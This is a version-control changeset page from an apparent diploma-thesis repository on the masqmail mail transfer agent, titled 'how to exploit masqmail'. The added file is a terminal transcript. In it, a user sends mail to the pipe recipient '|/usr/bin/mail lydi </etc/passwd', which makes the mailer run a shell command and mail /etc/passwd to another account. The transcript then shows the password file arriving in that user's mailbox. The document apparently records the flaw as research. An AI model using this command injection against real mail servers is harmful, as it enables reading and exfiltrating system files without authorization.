docs/diploma
changeset 198:402db7e2ecc4
how to exploit masqmail :-(
| author | meillo@marmaro.de |
|---|---|
| date | Wed, 31 Dec 2008 14:04:35 +0100 |
| parents | b08be036783d |
| children | 8af18dd9103f |
| files | hardcopies/bin-mail-attack.txt |
| diffstat | 1 files changed, 33 insertions(+), 0 deletions(-) [+] |
line diff
1.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000 1.2 +++ b/hardcopies/bin-mail-attack.txt Wed Dec 31 14:04:35 2008 +0100 1.3 @@ -0,0 +1,33 @@ 1.4 +test$ mail '|/usr/bin/mail lydi </etc/passwd' 1.5 +Subject: the password file 1.6 +hey hey jippee, here's your present :-) 1.7 +. 1.8 +Cc: 1.9 +test$ 1.10 + 1.11 + 1.12 + 1.13 + 1.14 +lydi$ mail 1.15 +Mail version 8.1.2 01/15/2001. Type ? for help. 1.16 +"/var/mail/lydi": 1 message 1 new 1.17 +>N 1 test@dream Wed Dec 31 11:12 46/1910 1.18 +& 1.19 +Message 1: 1.20 +From <test@dream> Wed Dec 31 11:12:45 2008 1.21 +Envelope-to: <lydi@dream> 1.22 +To: lydi 1.23 +From: <test@dream> 1.24 +Date: Wed, 31 Dec 2008 11:12:45 +0100 1.25 + 1.26 +root:x:0:0:root:/root:/bin/bash 1.27 +daemon:x:1:1:daemon:/usr/sbin:/bin/sh 1.28 +bin:x:2:2:bin:/bin:/bin/sh 1.29 +sys:x:3:3:sys:/dev:/bin/sh 1.30 +. 1.31 +. 1.32 +. 1.33 +test:x:1001:1002:test,,,:/home/test:/bin/bash 1.34 +lydi:x:1002:1003:lydi,,,:/home/lydi:/bin/bash 1.35 + 1.36 +&